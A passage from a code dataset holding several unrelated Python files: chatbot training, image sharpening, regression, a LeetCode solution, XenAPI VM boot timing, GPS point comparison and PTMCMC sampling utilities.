Y_train = []\n for (pattern_sentence, tag) in patterns:\n bag = bag_of_words(pattern_sentence, all_words)\n X_train.append(bag)\n label = tags.index(tag)\n Y_train.append(label)\n return np.array(X_train), np.array(Y_train)\n\n\ndef train_loop(model, epochs, optimizer, criterion, train_loader, test_loader,\n printing_gap, saved_model_device, model_path, device, PIK_plot_data):\n train_loss = []\n train_acc = []\n test_acc = []\n greatest_test_accu = -np.inf\n\n for epoch in range(epochs):\n loss_train = 0\n\n for sentences, labels in train_loader:\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences) # 1) Forward pass\n loss = criterion(output, labels) # 2) Compute loss\n optimizer.zero_grad()\n loss.backward() # 3) Backward pass\n optimizer.step() # 4) Update model\n\n loss_train += loss.item()\n\n model.eval()\n\n with torch.no_grad():\n train_num_correct = 0\n train_num_samples = 0\n\n for sentences, labels in iter(train_loader):\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences)\n _, predictions = output.max(1)\n train_num_correct += (predictions == labels).sum()\n train_num_samples += predictions.size(0)\n\n with torch.no_grad():\n test_num_correct = 0\n test_num_samples = 0\n for sentences, labels in iter(test_loader):\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences)\n _, predictions = output.max(1)\n test_num_correct += (predictions == labels).sum()\n test_num_samples += predictions.size(0)\n\n train_accu = float(train_num_correct) / train_num_samples * 100\n test_accu = float(test_num_correct) / test_num_samples * 100\n\n train_loss.append(loss_train / train_num_samples)\n train_acc.append(train_accu)\n test_acc.append(test_accu)\n\n # Save best model\n if test_accu >= greatest_test_accu:\n greatest_test_accu = test_accu\n\n best_model_state = copy.deepcopy(model)\n best_model_state.to(saved_model_device)\n torch.save(best_model_state, model_path)\n\n if epoch % printing_gap == 0:\n print('Epoch: {}/{}\\t.............'.format(epoch, epochs), end=' ')\n print(\"Train Loss: {:.4f}\".format(loss_train / train_num_samples), end=' ')\n 
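# The two torch.no_grad() accuracy loops above are identical apart from the
# loader; a single helper keeps them in sync. Hedged sketch reusing the same
# tensor operations as the loops (not part of the original training script):

import torch

def accuracy(model, loader, device):
    model.eval()
    correct, total = 0, 0
    with torch.no_grad():
        for sentences, labels in loader:
            sentences = sentences.to(device)
            labels = labels.to(dtype=torch.long).to(device)
            _, predictions = model(sentences).max(1)
            correct += (predictions == labels).sum().item()
            total += predictions.size(0)
    return 100.0 * correct / total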
print(\"Train Acc: {:.4f}\".format(train_accu), end=' ')\n print(\"Test Acc: {:.4f}\".format(test_accu), end=' ')\n print(\"Best Test Acc: {:.4f}\".format(greatest_test_accu))\n\n # Save data to pickle\n data = {'train_loss': train_loss, 'train_acc': train_acc, 'test_acc': test_acc}\n with open(PIK_plot_data, \"wb\") as f:\n pickle.dump(data, f)\n\n model.train()\n","repo_name":"anthony-chukwuemeka-nwachukwu/Chatbot","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73644216574","text":"# @description:\n# @author:Jianping Zhou\n# @email:jianpingzhou0927@gmail.com\n# @Time:2022/11/29 9:30\nimport cv2\nimport numpy as np\nfrom skimage import io\n\n# 导入图片\nraw_img = cv2.imread(\"../BMP_images/lena512.BMP\")\ncv2.imshow('raw_image', raw_img)\n\n# 转换灰度\n# gimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ngimg = raw_img\n\n# 高斯模糊化\n# dst = cv2.GaussianBlur(img,ksize=(5,5),sigmaX=0,sigmaY=0)\n# 创建毛玻璃特效\n# 参数2:高斯核的宽和高(建议是奇数)\n# 参数3:x和y轴的标准差\nimg = cv2.GaussianBlur(gimg, (11, 11), 0)\ncv2.imshow('GaussianBlur_image', img)\nio.imsave('./results/GaussianBlur_image.png', img)\n\n# 拉普拉斯算子锐化\nkernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32) # 定义拉普拉斯算子\ndst = cv2.filter2D(img, -1, kernel=kernel) # 调用opencv图像锐化函数\n\n# sobel算子锐化\n# 对x方向梯度进行sobel边缘提取\nx = cv2.Sobel(gimg, cv2.CV_64F, 1, 0)\n# 对y方向梯度进行sobel边缘提取\ny = cv2.Sobel(gimg, cv2.CV_64F, 0, 1)\n# 对x方向转回uint8\nabsX = cv2.convertScaleAbs(x)\n# 对y方向转会uint8\nabsY = cv2.convertScaleAbs(y)\n# x,y方向合成边缘检测结果\ndst1 = cv2.addWeighted(absX, 0.5, absY, 0.5, 0)\n# 与原图像堆叠\nres = dst1 + gimg\n\n# 测试\n# print(\"dstshape:\",dst1)\n# print(\"resshape:\",res)\n\n# 按要求左右显示原图与拉普拉斯处理结果\n# result1 = np.hstack([raw_img, img, dst])\nresult1 = dst\ncv2.imshow('lapres', result1)\nio.imsave('./results/lapres.png', result1)\n\n# 按要求左右显示原图与sobel处理结果\n# result2 = np.hstack([raw_img, img, res])\nresult2 = res\ncv2.imshow('sobelres', result2)\nio.imsave('./results/sobelres.png', result2)\n\n# 去缓存\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"JeremyChou28/digital_image_processing","sub_path":"project3/sharpen_laplace.py","file_name":"sharpen_laplace.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14345258445","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# Importing Necessary Libraries\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\n\n\n# In[4]:\n\n\n# Reading Data\ndata = pd.read_csv('/Users/shreyaspeherkar/Desktop/Dataset/HousingData.csv')\nprint(data.shape)\ndata.head()\n\n\n# In[5]:\n\n\n# Collecting X and Y\nX = data['DIS'].values\nY = data['MEDV'].values\n\n\n# In[7]:\n\n\nY\n#Y=mX+b m= difference in y coordinate/difference in x coordinate b= y-intercept\n\n\n# In[8]:\n\n\n# Calculating coefficient\n# Mean X and Y\nmean_x = np.mean(X)\nmean_y = np.mean(Y)\n# Total number of values\nn = len(X)\n\n\n# In[9]:\n\n\nn\n\n\n# In[10]:\n\n\n# Using the formula to calculate b1 and b2\nnumer = 0\ndenom = 0\nfor i in range(n):\n numer += (X[i] - mean_x) * (Y[i] - mean_y)\n denom += (X[i] - mean_x) ** 2\n b1 = numer / denom\n b0 = mean_y - (b1 * mean_x) \n# m(b1) and c(bo)\n# Printing coefficients 
\nprint(\"Coefficients\")\nprint(\"m=\",b1)\nprint(\"c=\",b0)\n\n\n# In[11]:\n\n\n# Plotting Values and Regression Line\nmax_x = np.max(X)\nmin_x = np.min(X)\n\n# Calculating line values x and y\n\nx = np.linspace(min_x, max_x, 1000)\ny = b0 + b1 * x\n\n# Ploting Line\n#plt.plot(x, y, color='#58b970', label='Regression Line')\nplt.plot(x, y, color='green', label='Regression Line')\n# Ploting Scatter Points\n#plt.scatter(X, Y, c='#ef5423', label='Scatter Plot') \nplt.scatter(X, Y, c='red', label='Scatter Plot')\n\nplt.xlabel('Head Size in cm3')\nplt.ylabel('Brain Weight in grams')\nplt.legend()\nplt.show()\n\n\n# In[12]:\n\n\n# Calculating R2 Score\nss_tot = 0\nss_res = 0\nfor i in range(n):\n y_pred = b0 + b1 * X[i]\n ss_tot += (Y[i] - mean_y) ** 2\n ss_res += (Y[i] - y_pred) ** 2\nr2 = 1 - (ss_res/ss_tot)\nprint(\"R2 Score\")\nprint(r2)\n\n\n# In[13]:\n\n\n#using scikit-learn\n\n\n# In[14]:\n\n\n# Importing Necessary Libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[16]:\n\n\ndata=pd.read_csv('/Users/shreyaspeherkar/Desktop/Dataset/HousingData.csv')\nX = data.iloc[:,7].values.reshape(-1,1) #converts it into numpy array\nY = data.iloc[:,13].values.reshape(-1,1) \nlinear_regressor=LinearRegression() # create obect for class \nlinear_regressor.fit(X,Y) # perform linear regression \ny_pred=linear_regressor.predict(X) # make prediction\n\n\n# In[17]:\n\n\nplt.scatter(X,Y)\nplt.plot(X,y_pred, color='red')\n\n\n# In[18]:\n\n\n# The coefficients\nprint(\"Coefficients: \\n\", linear_regressor.coef_)\n\n\n# In[19]:\n\n\nfrom sklearn.metrics import mean_squared_error, r2_score \nprint(\"Coefficient of determination: %.2f\" % r2_score(Y, y_pred))\n\n","repo_name":"Lagertharagnar/dsbda","sub_path":"DSBDA practical/DSBDA Practical No.04.py","file_name":"DSBDA Practical No.04.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28329683429","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/16 22:33\n# @Author : kangqing\n# @Email : kangqing.37@gmail.com\n# @File : LeetCode5185.py\n# @Software: PyCharm\n\"\"\" LeetCode5185 存在连续三个奇数的数组 \"\"\"\nfrom typing import List\n\n\nclass Solution:\n @staticmethod\n def three_consecutive_odds(arr: List[int]) -> bool:\n i, n = 1, len(arr)\n if n < 3:\n return False\n while i < n - 1:\n if arr[i] % 2 != 1:\n i += 1\n continue\n if arr[i - 1] % 2 != 1:\n i += 1\n continue\n if arr[i + 1] % 2 != 1:\n i += 1\n continue\n return True\n return False\n\n @staticmethod\n def three_consecutive_odds_1(arr: List[int]) -> bool:\n coll = list([])\n for x in arr:\n if x % 2 == 1:\n coll.append(x)\n if len(coll) == 3:\n return True\n else:\n coll.clear() \n return False\n\n\nif __name__ == '__main__':\n s = Solution()\n d = [1, 2, 34, 3, 4, 5, 7, 23, 12]\n print(s.three_consecutive_odds(d))\n print(s.three_consecutive_odds_1(d))\n\n","repo_name":"kangqing/LeetCode_Python","sub_path":"array/LeetCode5185.py","file_name":"LeetCode5185.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23473342877","text":"#!/usr/bin/env python3\n\n# Naz-Al Islam\n# 04/18/16\n# Car racing game\n\n\nclass Car:\n\n def __init__(self, start_pos, speed):\n self.carPos = start_pos\n self.carSpeed = speed\n\n def drive(self, time, direction):\n self.drvTime = time\n self.drvDirection = direction\n if 
self.drvDirection == 'forward':\n self.carPos = self.carPos + self.drvTime * self.carSpeed\n elif self.drvDirection == 'backward':\n self.carPos = self.carPos - self.drvTime * self.carSpeed\n\n def printPosition(self):\n print('The car is currently at position ' + str(self.carPos))\n\n\ndef main():\n myCar = Car(2, 3) \n myCar.printPosition()\n myCar.drive(3, 'forward')\n myCar.printPosition()\n myCar.drive(2, 'backward')\n myCar.printPosition()\n\n print()\n\n newCar = Car(5, 7)\n newCar.printPosition()\n newCar.drive(4, 'forward')\n newCar.printPosition()\n newCar.drive(3, 'backward')\n newCar.printPosition()\n newCar.drive(1, 'backward')\n newCar.printPosition()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nazislam/Python-Console-Applications","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29757583690","text":"# so replit recgonizes objects from cmu_graphics\nimport random\n\nrandrange = random.randrange\n\n\nclass app:\n background: str\n\n\nclass cmu_graphics:\n def run():\n ...\n\n\nclass Rect:\n def __init__(\n self,\n left,\n top,\n width,\n height,\n fill=\"black\",\n border=None,\n borderWidth=2,\n opacity=100,\n rotateAngle=0,\n dashes=False,\n align=\"left-top\",\n visible=True,\n ):\n ...\n\n\nclass Label:\n def __init__(\n self,\n value,\n centerX,\n centerY,\n size=12,\n font=\"arial\",\n bold=False,\n italic=False,\n fill=\"black\",\n border=None,\n borderWidth=2,\n opacity=100,\n rotateAngle=0,\n align=\"center\",\n visible=True,\n ):\n ...\n\n\nclass Image:\n health: int\n food: int\n\n def __init__(self, url, left, top):\n ...\n\n\nclass Group:\n def __init__(self, *args):\n ...\n\n\nclass Star:\n def __init__(\n centerX,\n centerY,\n radius,\n points,\n fill=\"black\",\n border=None,\n borderWidth=2,\n roundness=None,\n opacity=100,\n rotateAngle=0,\n dashes=False,\n align=\"center\",\n visible=True,\n ):\n ...\n\n\npythonRound = round\n","repo_name":"TheMaster3558/Orca-Migration","sub_path":"cmu_types.py","file_name":"cmu_types.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2749564141","text":"#\r\n# UefiDevicePathLib.py\r\n#\r\n# Copyright (C) 2015 efipy.core@gmail.com All rights reserved.\r\n#\r\n# UefiDevicePathLib.py is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 2 of the License.\r\n#\r\n# EfiPy is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EfiPy. 
If not, see .\r\n#\r\n\r\nUSB_CLASS_AUDIO = 1\r\nUSB_CLASS_CDCCONTROL = 2\r\nUSB_CLASS_HID = 3\r\nUSB_CLASS_IMAGE = 6\r\nUSB_CLASS_PRINTER = 7\r\nUSB_CLASS_MASS_STORAGE = 8\r\nUSB_CLASS_HUB = 9\r\nUSB_CLASS_CDCDATA = 10\r\nUSB_CLASS_SMART_CARD = 11\r\nUSB_CLASS_VIDEO = 14\r\nUSB_CLASS_DIAGNOSTIC = 220\r\nUSB_CLASS_WIRELESS = 224\r\n\r\nUSB_CLASS_RESERVE = 254\r\nUSB_SUBCLASS_FW_UPDATE = 1\r\nUSB_SUBCLASS_IRDA_BRIDGE = 2\r\nUSB_SUBCLASS_TEST = 3\r\n\r\nRFC_1700_UDP_PROTOCOL = 17\r\nRFC_1700_TCP_PROTOCOL = 6\r\n\r\n","repo_name":"melxman/UEFI-BIOS-Flasher","sub_path":"StdLib/lib/python.27/site-packages/EfiPy/MdePkg/Library/UefiDevicePathLib.py","file_name":"UefiDevicePathLib.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2008864573","text":"from __future__ import print_function\nimport XenAPI\nimport sys\nimport time\n\nvgm_to_vm = {}\n\n\ndef register_vm_metrics(session, vm_ref, vgm):\n global vgm_to_vm\n\n try:\n # avoid putting invalid references in the cache\n tmp = session.xenapi.VM_guest_metrics.get_other(vgm)\n vgm_to_vm[vgm] = vm_ref\n except:\n pass\n\n\ndef vm_of_metrics(ref):\n global vgm_to_vm\n if not(ref in vgm_to_vm.keys()):\n return None\n return vgm_to_vm[ref] \n\ninteresting_vms = []\nvm_boot_times = {}\nboots_seen = 0\n\n\ndef dump_table(session):\n global vm_boot_times\n for vm_ref in vm_boot_times.keys():\n name = session.xenapi.VM.get_name_label(vm_ref)\n print(\"%s %s\" % (name, vm_boot_times[vm_ref]))\n\n\ndef seen_possible_boot(session, vm_ref):\n global vm_boot_times\n global interesting_vms\n global boots_seen\n if not(vm_ref in vm_boot_times.keys()) and vm_ref in interesting_vms:\n t = time.strftime( \"%Y%m%dT%H:%M:%SZ\", time.gmtime())\n vm_boot_times[vm_ref] = t\n boots_seen += 1\n \n name = session.xenapi.VM.get_name_label(vm) \n print(\"%d %s %s\" % (boots_seen, name, t), file=sys.stdout)\n print(\"%d %s %s\" % (boots_seen, name, t), file=sys.stderr)\n sys.stderr.flush()\n\n\ndef process_guest_metrics(session, ref, snapshot):\n if \"other\" in snapshot.keys():\n other = snapshot[\"other\"]\n if \"feature-shutdown\" in other.keys():\n the_vm = vm_of_metrics(ref)\n seen_possible_boot(session, the_vm)\n\n\ndef poll_metrics(session):\n while True:\n time.sleep(10)\n all_recs = session.xenapi.VM_guest_metrics.get_all_records()\n for ref in all_recs.keys():\n snapshot = all_recs[ref]\n process_guest_metrics(session, ref, snapshot)\n\n\ndef process_metrics_event(session, ref):\n vm_ref = vm_of_metrics(ref)\n if vm_ref is None:\n return\n if session.xenapi.VM.get_power_state(vm_ref) != \"Running\":\n return\n other = {}\n try:\n other=session.xenapi.VM_guest_metrics.get_other(ref)\n except Exception as e:\n print(repr(e))\n \n if \"feature-shutdown\" in other.keys():\n seen_possible_boot(session, vm_ref)\n \n\ndef watch_events_on_vm(session):\n try:\n token = ''\n call_timeout = 30.0\n while True:\n output = session.xenapi.event_from([\"VM\", \"VM_guest_metrics\"], token, call_timeout)\n events = output['events']\n token = output['token']\n\n for event in events:\n if event['operation'] == 'del':\n continue\n if event['class'] == 'vm' and event['operation'] == 'mod':\n register_vm_metrics(session, event['ref'], event['snapshot']['guest_metrics'])\n continue\n if event['class'] == 'vm_guest_metrics':\n process_metrics_event(session, event['ref'])\n continue\n\n except XenAPI.Failure as e:\n print(e.details)\n sys.exit(1)\n finally:\n 
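# Performing the logout inside this finally block is deliberate: each
# successful login_with_password creates a session tracked on the server,
# and a watcher that dies without logging out leaves a stale session
# lingering until xapi expires it. Placing the logout here covers both the
# normal exit and the XenAPI.Failure path above.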
session.xenapi.session.logout()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 4 or len(sys.argv) < 2:\n print(\"\"\"\nWatches all offline VMs for boots\nUsage:\n %s \nor\n %s [http://]localhost [] []\n\"\"\" % (sys.argv[0], sys.argv[0]))\n sys.exit(1)\n\n url = sys.argv[1]\n username = sys.argv[2] if len(sys.argv) > 2 else \"\"\n password = sys.argv[3] if len(sys.argv) > 3 else \"\"\n\n if url == \"http://localhost\" or url == \"localhost\":\n new_session = XenAPI.xapi_local()\n else:\n new_session = XenAPI.Session(url)\n\n # First acquire a valid session by logging in\n try:\n new_session.xenapi.login_with_password(username, password, \"1.0\", \"xen-api-scripts-timevmboots.py\")\n except XenAPI.Failure as f:\n print(\"Failed to acquire a session: %s\" % f.details)\n sys.exit(1)\n\n # We start watching all Halted VMs\n all_halted_vms = new_session.xenapi.VM.get_all_records()\n for vm in all_halted_vms.keys():\n vm_rec = all_halted_vms[vm]\n if vm_rec[\"power_state\"] == \"Halted\" and not vm_rec[\"is_a_template\"]:\n interesting_vms.append(vm)\n print(\"Watching %d offline VMs\" % (len(interesting_vms)), file=sys.stderr)\n\n watch_events_on_vm(new_session)\n","repo_name":"xapi-project/xen-api","sub_path":"scripts/time-vm-boots.py","file_name":"time-vm-boots.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"79"} +{"seq_id":"42956294645","text":"#! /usr/bin/env python\n\n\"\"\"\nUpdate Emlid Reach CSV Survey points with PPK position accuracy\n\nAuthor: Thomas Van Der Weide\n\"\"\"\n\nimport pandas as pd\nimport glob\nfrom geopy import Point, distance\nimport os\n\n\ndef calc_distances(coords: pd.DataFrame,\n col_lat='latitude(deg)',\n col_lon='longitude(deg)',\n point_obj=Point) -> pd.DataFrame:\n traces = len(coords)\n distances = [None] * (traces)\n for i in range(traces):\n # start = point_obj((coords.iloc[0][col_lat], coords.iloc[0][col_lon]))\n # Find the distance from the mean location\n start = point_obj((coords[col_lat].mean(), coords[col_lon].mean()))\n finish = point_obj((coords.iloc[i][col_lat], coords.iloc[i][col_lon]))\n distances[i] = {\n 'start': start,\n 'finish': finish,\n 'path distance': distance.geodesic(start, finish).meters,\n }\n \n distVec = pd.DataFrame(distances)[\"path distance\"]\n\n return distances, distVec\n\n\n\nif __name__ == \"__main__\": \n #Define CSV and POS file locations\n main_fold = \"E:/SnowDrones_HDrive/2022_Data/SurveyDates/22-3-17_PilotsPeak/SDP/rinex_reach_raw_202203172156/\"\n \n # Find the CSV file\n for csvFN in sorted(glob.iglob(main_fold + \"Comp.csv\")):\n csvFN = csvFN.replace('\\\\', '/')\n print(\"csvFN: \", csvFN)\n survey_pts_csv_fn = csvFN\n \n \n #Load the Files\n print('Loading: %s' % survey_pts_csv_fn)\n survey_pts = pd.read_csv(survey_pts_csv_fn, index_col=0)\n out_pt = []\n print('Processing %i input points' % survey_pts.shape[0])\n for GCP, pt in survey_pts.iterrows():\n print(GCP)\n PythonPPK = Point((pt[\"PyLat\"], pt[\"PyLon\"]))\n EmlidPPK = Point((pt[\"EmLat\"], pt[\"EmLon\"]))\n print(distance.geodesic(PythonPPK, EmlidPPK).meters)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"tvanderweide/SnowDrones","sub_path":"EmlidvsPythonPPK_Check.py","file_name":"EmlidvsPythonPPK_Check.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"9392384638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\n\"\"\"\nHandy PTMCMC scripts.\n\nAuthor:\n Dimitri Misiak (misiak@ipnl.in2p3.fr)\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sgl\nimport emcee\nimport corner\nimport os\nimport __main__\n\nimport sys\nfrom os import path\nsys.path.append( path.dirname( path.abspath(__file__) ) )\nfrom savesys import savetxt, loadtxt\n\n\ndef chi2(time, data_1, data_2, noise=1):\n \"\"\"Computes the chi2 function in frequency space.\n OLD FUNCTION NEEDED IN ANCIENT TEST FILES. DO NOT USE !!\n Parameters\n ----------\n data_1 : array_like\n First data array to be compared.\n data_2 : array_like\n Second data_array to be compared.\n noise : array_like or float\n PSD of the noise affecting the data.\n\n Returns\n -------\n x2 : float\n Value of the chi2 function. It should tends to dof if the data and\n noise are compatible.\n dof : int\n Degrees Of Freedom. Use to compute a normalized chi2.\n \"\"\"\n # computes the psd correction coefficient\n t_step = time[1] - time[0]\n t_len = time[-1] - time[0]\n psd_corr = 2 * t_step**2 / t_len\n\n # computes the fft of the data\n # removing the frequency 0, and cropping the negative frequencies\n # WILL NOT WORK FOR t_len > 0.999 !!!\n ind = int(t_step**-1 /2) +1\n d1 = np.fft.fft(data_1)[1:ind]\n d2 = np.fft.fft(data_2)[1:ind]\n\n # noise psd\n J = np.array(noise)\n\n # computes the chi2\n x2 = np.sum( psd_corr * np.abs(d1-d2)**2 / J )\n\n # computes the dof\n dof = len(d1)\n\n return x2, dof\n\ndef chi2_new(time, data_1, data_2, noise=1):\n \"\"\"Computes the chi2 function in frequency space.\n OLF FUNCTION NEEDED IN ANCIENT TEST FILES . DO NOT USE !!\n Parameters\n ----------\n data_1 : array_like\n First data array to be compared.\n data_2 : array_like\n Second data_array to be compared.\n noise : array_like or float\n PSD of the noise affecting the data.\n\n Returns\n -------\n x2 : float\n Value of the chi2 function. It should tends to dof if the data and\n noise are compatible.\n dof : int\n Degrees Of Freedom. Use to compute a normalized chi2.\n \"\"\"\n # computes the psd correction coefficient\n t_step = time[1] - time[0]\n t_len = time[-1] - time[0]\n psd_corr = 2 * t_step**2 / t_len\n\n # noise psd\n J = np.array(noise)\n\n # computes the chi2\n x2 = np.sum( psd_corr * np.abs(data_1-data_2)**2 / J )\n\n # computes the dof\n dof = len(data_1)\n\n return x2, dof\n\ndef ptmcmc_sampler(aux, bounds, nsteps, ntemps, nwalkers=None,\n condi=None):\n \"\"\" MCMC Analysis routine. Log scale seach in parameter space.\n\n Parameters\n ----------\n aux : function\n Minimized function. Should be a frequency chi2 function\n for proper results.\n bounds: array_like of tuple of 2 floats\n Starting parameter set for MCMC analysis.\n nsteps : int\n Number of steps.\n nwalkers : None or int, optional\n Numbers of walkers. Should not be inferior to 2 times\n the number of parameters. By default, set to 10 times\n the number of parameters.\n savename : str, optional\n Path the save directory\n Returns\n -------\n sampler : emcee.ensemble.EnsembleSampler\n Object manipulated by the mcmc. 
Has several class attributes which\n contain the Markov chain, the lnprob list, and other characteristics\n of the mcmc analysis.\n \"\"\"\n # extracts the sup bounds and the inf bounds\n bounds = list(bounds)\n binf = list()\n bsup = list()\n for b in bounds:\n inf, sup = b\n binf.append(inf)\n bsup.append(sup)\n binf = np.array(binf)\n bsup = np.array(bsup)\n\n # additionnal constrain as function of the parameters\n if condi == None:\n condi = lambda p: True\n\n # Loglikelihood function taking into accounts the bounds\n def loglike(x):\n \"\"\" Loglikelihood being -chi2/2.\n Take into account the bounds.\n \"\"\"\n cinf = np.sum(xbsup)\n if cinf == 0 and csup == 0 and condi(x) == True:\n# return -0.5*aux(np.power(10,x))\n return -0.5*aux(x)\n else:\n return -np.inf\n\n # number of parameters/dimensions\n ndim = len(bounds)\n\n # default nwalkers\n if nwalkers == None:\n nwalkers = 10 * ndim\n\n # walkers are uniformly spread in the parameter space\n ntemps = ntemps\n\n pos_temp = list()\n for k in range(ntemps):\n\n pos = list()\n for n in range(nwalkers):\n accept = False\n while not accept:\n new_pos = [\n np.random.uniform(low=l, high=h) for l,h in zip(binf, bsup)\n ]\n accept = condi(new_pos)\n pos.append(new_pos)\n\n pos_temp.append(pos)\n\n# pos_temp = np.random.uniform(low=-6.0, high=0.0, size=(ntemps, nwalkers, ndim))\n\n pos_temp = np.array(pos_temp)\n# print 'pos_temp.shape =', pos_temp.shape\n\n # MCMC analysis\n# sampler = emcee.EnsembleSampler(nwalkers, ndim, loglike)\n logp = lambda x: 0.0\n sampler = emcee.PTSampler(ntemps, nwalkers, ndim, loglike, logp)\n sampler.run_mcmc(pos_temp, nsteps, rstate0=np.random.get_state())\n\n return sampler\n\ndef save_ptmcmc_sampler(sampler, bounds, path='mcmc_sampler/autosave'):\n \"\"\" Save the data contained in the ptmcmc sampler.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n\n # saving the markov chain\n with open(os.path.join(path,'chain.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(sampler.chain.shape))\n for data_temp in sampler.chain:\n for data_slice in data_temp:\n np.savetxt(outfile, data_slice)\n outfile.write('# Next walker\\n')\n outfile.write('# Next temperature\\n')\n\n # saving the lnprob\n lnprob = sampler._lnprob\n with open(os.path.join(path,'lnprob.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(lnprob.shape))\n for data_temp in lnprob:\n np.savetxt(outfile, data_temp)\n outfile.write('# Next temperature\\n')\n\n # saving the acceptance fraction\n acc = sampler.acceptance_fraction\n with open(os.path.join(path,'acceptance.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(acc.shape))\n for data_temp in acc:\n np.savetxt(outfile, data_temp)\n outfile.write('# Next temperature\\n')\n\n entries = ('source', 'bounds',\n 'dim', 'iterations', 'nwalkers', 'ntemps')\n\n try:\n source = __main__.__file__\n except:\n source = os.getcwd()\n\n values = (source, bounds,\n sampler.dim, sampler.chain.shape[2], sampler.nwalkers,\n sampler.ntemps)\n\n savetxt(entries, values, fpath=os.path.join(path ,'log.dat'))\n\n\ndef get_ptmcmc_sampler(sdir):\n \"\"\" Read the sampler info from disk created by mcmc_sampler.\n\n Parameters\n ----------\n sdir : str\n Save directory path.\n\n Returns\n -------\n logd : dict\n Contains the characteristics of the mcmc analysis.\n chain : ndarray\n Array of shape (nwalkers, nsteps, ndim). 
Contains the positions of\n all walkers for each iterations.\n lnprob : ndarray\n Array of shape (nwalkers, nsteps). Contains the log probability\n of all walkers for each iterations.\n \"\"\"\n # log chain, lnprob file path\n logpath = os.path.join(sdir, 'log.dat')\n chainpath = os.path.join(sdir, 'chain.dat')\n lnpath = os.path.join(sdir, 'lnprob.dat')\n accpath = os.path.join(sdir, 'acceptance.dat')\n\n # read log and extracts info into dict\n entries, values = loadtxt(logpath)\n logd = dict([(e,v) for e,v in zip(entries, values)])\n\n # extracting shape of the chain and lnprob arrays\n ndim = int(logd['dim'])\n nwalkers = int(logd['nwalkers'])\n nsteps = int(logd['iterations'])\n ntemps = int(logd['ntemps'])\n\n # read chain\n chain = np.loadtxt(chainpath)\n chain = chain.reshape((ntemps, nwalkers, nsteps, ndim))\n# chain = chain.reshape((ntemps * nwalkers, nsteps, ndim))\n\n # read lnprob\n lnprob = np.loadtxt(lnpath)\n lnprob = lnprob.reshape((ntemps, nwalkers, nsteps))\n\n beta = emcee.ptsampler.default_beta_ladder(ndim, ntemps)\n beta = beta.reshape( (ntemps, 1, 1) )\n lnprob = lnprob / beta\n# lnprob = lnprob.reshape((ntemps * nwalkers, nsteps))\n\n # read acceptance\n acc = np.loadtxt(accpath)\n acc = acc.reshape((ntemps, nwalkers))\n\n return logd, chain, lnprob, acc\n\n\ndef ptmcmc_plots(ntemps, ndim, chain, lnprob, acc, labels):\n\n cmap = plt.get_cmap('jet')\n cmap = cmap(np.linspace(0., 1., ntemps))\n\n for k in reversed(range(ntemps)):\n\n ch = chain[k]\n ln = lnprob[k]\n ac = acc[k]\n c = cmap[k]\n\n plt.figure('Acceptance fraction')\n plt.plot(ac, color=c)\n\n # CONVERGENCE plot\n fig = plt.figure(num='CONVERGENCE', figsize=(7,8))\n ax = fig.get_axes()\n # Check if the figure was already plotted.\n if not len(ax):\n fig, ax = plt.subplots(ndim+1, 1, sharex=True, figsize=(7, 8),\n num='CONVERGENCE')\n\n ax[-1].set_xlabel('Iterations')\n ax[-1].set_yscale('log')\n for a, l in zip(ax, labels + ('lnprob',)):\n a.set_ylabel(l)\n a.grid()\n\n # plotting the lnprob array and the cut threshold\n ax[-1].plot(-ln.T, color=c)\n\n # loop over the chains\n for chk, lnk in zip(ch, ln):\n for n in 